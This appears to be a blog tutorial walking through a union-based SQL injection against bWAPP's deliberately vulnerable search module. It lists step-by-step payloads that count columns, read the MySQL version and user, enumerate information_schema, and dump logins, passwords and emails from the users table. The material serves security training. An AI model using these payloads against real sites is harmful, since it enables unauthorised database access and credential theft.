In bWAPP There is a SQL Injection module which exploits a GET search checking against a mysql database. Our first test is to see if we can create a TRUE condition in the SQL Query.
a' or 1=1#
As you can see we successfully injected the title parameter with our own SQL Query now lets see how many columns we have.
a' order by 1#
This came back with a false result. What we are looking for is a true response or an error message saying 'unknown column number'.
a' order by 8#
Here is the result we are looking for. The unknown column number tells us that there are seven columns in the present table. Our next task is to try and identify visible columns where we can extract data from.
a' union select 1,2,3,4,5,6,7 #
We can see columns 2,3,4 and 5 are visible. Lets inject some common mysql functions and variables.
a' union select 1,2,@@version,4,5,6,7 #
This showing us the version of mysql we are running.
a' union select 1,database(),@@version,4,user(),6,7 #
Here we selected the database() function to get the current working database. The @@version variable and the user() function.
a' union select 1,concat(schema_name),3,4,5,6,7 FROM information_schema.schemata#
Its now time to Extract the database schema.
a' union select 1,2,table_name,4,5,6,7 from INFORMATION_SCHEMA.TABLES where table_schema=database()#
Extract current tables in the current database.
a' union select 1,2,column_name,4,5,6,7 from INFORMATION_SCHEMA.COLUMNS where table_name='users' and table_schema=database()#
Extract column names from table 'users'.
a' union select 1,login,password,4,email,6,7 from users#
Select login,email and password fields from users table and dump the information.
No comments:
Post a Comment